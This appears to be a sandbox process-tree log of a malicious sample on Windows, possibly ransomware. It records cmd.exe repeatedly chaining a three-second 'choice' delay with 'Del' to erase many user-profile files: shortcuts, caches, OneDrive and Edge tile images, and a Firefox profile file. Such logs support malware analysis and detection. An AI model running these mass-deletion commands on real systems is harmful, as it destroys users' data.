C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-200.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-400.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-100.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-125.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-150.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-200.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-400.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-100.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-125.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-150.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-200.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-400.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-100.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-125.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-150.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-200.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-400.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Are.docx.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Files.docx.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\ms-gamingoverlay--kglcheck-.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Opened.docx.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Recently.docx.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\The Internet.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\These.docx.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\blurrect.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - NetworkStatus.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\06 - SystemAbout.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\08 - PowerAndSleep.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\10 - AppsAndFeatures.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579835715623587.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579836396808386.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579836700564513.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579836773309643.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579836950910002.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579837011585625.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579837074163023.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579837250240037.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579837309464105.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579837373475837.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579838220366267.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579838852286601.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579842343041030.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579842643381578.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579842943766940.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579843351451077.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579843745669167.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579843950468156.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579845219188447.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579845518899265.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579845818793631.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579846118943380.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579846913689448.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579873464514184.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133579876430161916.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\md1ejlmw.default-release\pkcs11.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\3X7K2ORY\known_providers_download_v1[1].xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\B91VJWSD\update100[1].xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{0e75dae2-a549-4aac-a9fd-9edba88f5856}\0.0.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
